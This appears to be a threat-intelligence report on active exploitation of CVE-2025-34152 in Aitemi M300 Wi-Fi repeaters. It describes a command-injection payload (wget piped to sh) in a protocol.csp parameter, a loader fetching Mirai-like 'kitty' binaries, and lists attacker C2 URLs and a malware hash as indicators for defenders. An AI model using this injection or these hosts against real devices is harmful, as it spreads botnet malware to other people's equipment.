Public evidence of CVE-2025-34152 being actively exploited in the wild. Includes log excerpts, malicious loader script, running process list, and malware sample (Mirai variant).

CVE-2025-34152-exploitation-report.md

CVE-2025-34152 - Active Exploitation in the Wild

Date observed: September 2025
Affected devices: Shenzhen Aitemi M300 (MT02) Wi-Fi Repeaters

1. Exploit Trigger (Captured Logs)

Evidence from /tmp/commuos.log showing remote code execution via protocol.csp.
The attacker injects a wget | sh payload in the time parameter.

2. Malicious Loader Script

The fetched script router.aitemi.sh downloads and executes multiple architecture-specific binaries (kitty.*), then deletes them.

3. Post-Infection Evidence

Process list on the compromised device shows multiple running instances of kitty.mips, confirming infection.

4. Malware Sample

The binary retrieved from the device was uploaded to VirusTotal for analysis (30 / 63 detections).

• SHA256: 53b0848fd203ff8efaee5c44931ec250d8c1116c4935288de1fd7100753bbbe6
• VirusTotal: View Analysis

Indicators of Compromise (IoCs)

Type	Value
C2 URLs	http://196.251.84.194/router.aitemi.sh, http://196.251.84.253/router.aitemi.sh
Dropped Files	kitty.arm, kitty.mips, kitty.mipsel, kitty.aarch64, kitty.x86, kitty.x86_64
SHA256	53b0848fd203ff8efaee5c44931ec250d8c1116c4935288de1fd7100753bbbe6

Conclusion

These artifacts confirm that CVE-2025-34152 is actively exploited in the wild by an IoT botnet variant (Mirai-like).
The exploit chain:

1. RCE on vulnerable device via protocol.csp
2. Download and execution of a multi-architecture loader
3. Deployment of a bot binary joining the device to a botnet

⚠️ Note: Attacker infrastructure and malware IoCs are disclosed for defender use.